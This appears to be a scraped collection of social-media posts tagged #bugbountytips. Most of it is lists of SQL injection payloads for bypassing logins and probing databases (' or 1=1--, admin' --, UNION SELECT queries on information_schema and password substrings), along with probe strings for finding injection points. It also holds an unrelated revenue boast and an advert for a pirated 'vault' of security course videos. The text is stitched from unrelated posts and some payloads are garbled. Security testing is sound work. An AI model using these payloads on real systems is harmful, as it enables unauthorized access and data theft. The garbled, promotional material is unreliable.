MY FIRST X VIDEO MADE OVER $250,000! π²
But itβs a bit of a facade. Advertisers saw the attention it was getting and bought ads on my video (I think) and thus my revenue per view is prob higher than what youβd experience
SQL Injection - Bypass Auth Payloads
#bugbountytips #bugbountytip
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
Auth bypass Via SQL Injection Payloads #bugbountytips #bugbountytips
' or 'a'='a
' or a=a--
' or a=aβ
') or ('a'='a
" or "a"="a
") or ("a"="a
') or ('a'='a and hi") or ("a"="a
' or 'one'='one
' or 'one'='oneβ
' or uid like '%
' or uname like '%
' or userid like '%
payloads by Auth Bypass
' OORR 1<2 #
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
#bugbountytips #bugbountytip
here are some tips that are used to easily find sql-Injection 70%
/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1''asd'' <== concat string
Thanks #bugbountytips
Auth Bypass via SQL
') or ('a'='a and hi") or ("a"="a
' UNION ALL SELECT 1, @version;#
' UNION ALL SELECT system_user(),user();#
' UNION select table_schema,table_name FROMinformation_Schema.tables;#
admin' and substring(password/text(),1,1)='7
#bugbountytip
Alhamdulillah, I awarded $2750 from HackerOne
Vulnerable: Account Takeover
Tips: always check everything and function,check login history and update passwd or reused #bugbounty
Bug : rate limit otp bypass
SQLi To Auth bypass
' group by password having 1=1--
' group by userid having 1=1--
' group by username having 1=1- information_Schema.tables;# admin'
and substring(password/text(),1,1)='7 ' and substring(password/text(),1,1)='7
#bubountytip #bubountytips
π§ π£ 381 FILES. 200+ GB. ELITE ONLY.
I just unlocked a vault that would make even top bug bounty hunters drop everything:
π₯ OSCP
π₯ OSEP
π₯ OSWE
π₯ THM / HTB
π₯ EC-Council
π₯ Cisco CyberOps
π₯ Linux Priv Esc
π₯ PEN-300 Full Video Series
π₯ BloodHound, AD, SSH, API, SQL, π₯
IDOR on user profile update
IDOR via email enumeration
IDOR on subscription APIs
Broken object-level authorization in API
Reflected XSS in search bar
Stored XSS in comments
DOM-based XSS in JS-heavy pages
Open redirect via query param
Open redirect with base64 trick